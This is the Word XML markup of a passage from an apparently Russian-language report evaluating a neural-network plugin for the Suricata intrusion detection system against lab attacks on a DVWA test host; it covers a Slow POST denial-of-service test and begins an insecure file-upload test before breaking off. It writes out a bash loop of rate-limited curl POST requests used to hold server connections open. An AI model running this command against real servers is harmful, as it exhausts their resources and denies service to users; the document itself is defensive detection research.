        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287C953" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="001D324E" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E434D32" w14:textId="249C07D1" w:rsidR="008E0171" w:rsidRPr="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.11 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 11. Медленный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F53B0D"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t xml:space="preserve">Проверка способности нейросетевого модуля обнаруживать медленные атаки типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Denial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service, направленные на исчерпание ресурсов веб-сервера путём удержания открытых соединений. Для имитации атаки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Slow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST с атакующей станции инициировалась серия параллельных POST-запросов с намеренно замедленной передачей данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C64C701" w14:textId="77777777" w:rsidR="00BD74AB" w:rsidRPr="001D324E" w:rsidRDefault="00BD74AB" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E72AED" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For i in {</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50}; do curl - X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00A10D48">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http://192.168.0.104/login.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - H "Content- Length: 1000000" - d "data=testing" --limit-rate 10b -m 5 &amp; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEBB1F" w14:textId="77777777" w:rsidR="009534A2" w:rsidRPr="00ED4CBB" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5766B1B2" w14:textId="505472DD" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">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lastRenderedPageBreak/>
        <w:t>Передача полезной нагрузки намеренно замедлялась до 10 байт в секунду, что заставляло сервер удерживать TCP-соединение открытым в ожидании завершения передачи.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Процесс обнаружения показан на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BBCD36"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54BC5866" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FFA4F02" wp14:editId="3DD86BBF">
            <wp:extent cx="6124776" cy="3152775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1396818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18346" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6138265" cy="3159719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58981B58" w14:textId="467F3220" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="005C39E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– Обнаружение </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE1566">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DD416" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509E3705" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00663CF9" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663CF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Нейросетевой плагин успешно обнаружил аномальную активность, зафиксировав аномально низкую скорость передачи данных в сочетании с большим количеством одновременно открытых соединений.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B18B4A" w14:textId="4F9A4BE5"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244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сформировала </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Медленный </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Slow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST сложнее обнаружить сигнатурным методом по сравнению с классическим SYN-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — каждый отдельный POST-запрос является легитимным с точки зрения протокола HTTP. Для обнаружения данного типа атак в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> требуется настройка специализированных правил с порогами по времени удержания соединений или подключение модуля </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>потокового</w:t>
      </w:r>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> анализа. В базовом наборе правил Emerging </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Threats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open </w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6" w:rsidRPr="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[1</w:t>
      </w:r>
      <w:r w:rsidR="006D0511" w:rsidRPr="006D0511">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6" w:rsidRPr="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">правила для обнаружения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Slow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00244ABF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST отсутствуют.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="001B31D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64535666" w14:textId="77777777" w:rsidR="0099286E" w:rsidRDefault="0099286E" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FFD3989" w14:textId="40899166" w:rsidR="008E0171" w:rsidRPr="00BD74AB" w:rsidRDefault="00BD74AB" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.4.12 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 12. Небезопасная загрузка файлов </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70951ABA" w14:textId="4B2A0779"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t>Для тестирования использовалась уязвимость модуля загрузки файлов в DVWA.</w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Данная атака относится к категории небезопасного дизайна — веб-приложение не проверяет реальный тип загружаемого файла, ориентируясь только на расширение или заголовок MIME. Злоумышленник указывает тип содержимого </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD74AB" w:rsidRPr="00BD74AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>jpeg</w:t>
      </w:r>
